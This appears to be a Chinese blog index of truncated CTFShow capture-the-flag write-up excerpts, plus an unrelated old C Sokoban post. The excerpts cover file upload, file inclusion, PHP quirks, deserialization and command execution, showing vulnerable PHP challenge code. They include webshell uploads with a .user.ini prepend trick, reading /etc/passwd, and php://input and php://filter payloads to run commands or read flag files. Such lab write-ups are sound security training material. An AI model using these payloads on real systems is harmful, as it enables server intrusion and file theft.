CTFShow-反序列化
CTFShow 反序列化
web254源码:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-02 17:44:47# @Last Modified by: h1xa# @Last Modified time: 2020-12-02 19:29:02# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; ...
CTFShow-文件上传
CTFShow 文件上传web151
先来上传一张正常图片发现不能上传jpg格式,可以上传png格式.并返回了上传路径: /upload/2.png
使用 Burp 抓包将一句话图片更改后缀为.php ,并成功返回了上传路径 /upload/yjh.php
蚁剑连接。
成功在上一级目录中找到了flag
也可以不用蚁剑,直接访问上传的文件,并post 传入 一句话木马的密码=你想构造的语句。
web152后端校验要严密
上传图片马: 并抓包修改后缀
可见上传成功,似乎和web151一样,蚁剑连接或访问试试
当前目录没有,再试试上一级目录。
还是在上一级目录。
web153
仍然一样的页面
继续web152的套路试试
显示内容为 文件类型不和规,那肯定是对写入的内容进行了过滤。但是不知道过滤了哪些内容。
这题涉及到了一个新的内容: .user.ini 文件:简单来说是用户对环境的配置文件。
先上传 .user.ini.png 文件,抓包删除.png后缀
12GIF89a // 文件格式,告知系统这是 GIF89a格式生成图形auto_prepend_file=yjh ...
CTFShow 文件包含笔记
CTFShow 文件包含笔记web78——文件包含——php伪协议源码:
1234567 <?phpif(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);}
方法一:
尝试是否可以查看 /etc/passwd中的内容: 发现可以查看
1?file=/etc/passwd
尝试使用 php://input 协议:
123?file=php://inputpost:<?php system("ls");?> / <?php system("tac flag.php");?>
方法二:
1. 尝试使用 php://filter/read=convert.base64-encode/resource=flag.php
base64解码:
123456789 ...
CTFShow PHP特性
CTFShow PHP 特性web89源码:
1234567891011121314151617181920212223242526<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-16 11:25:09# @Last Modified by: h1xa# @Last Modified time: 2020-09-18 15:38:51# @email: h1xa@ctfer.com# @link: https://ctfer.com*/include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(in ...
CTFShow Web笔记
ctfshow 命令执行笔记web34——命令执行源码:
123456789101112<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}
过滤了:flag, system, php, cat, sort, shell, 小数点, 空格, 单引号,反引号,echo, 分号,左括号,冒号,双引号;此题同上一题类似
1?c=include$_GET[x]?>&x=php://filter/read=convert.base64-encode/reso ...
OLD
OLD以往旧的内容:不值一提
推箱子单关卡初次使用二维数组并编写经典小游戏:推箱子!(单关卡)
注:查阅过百度,烦请喷哥留德。
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167#include <stdio.h>#include <st ...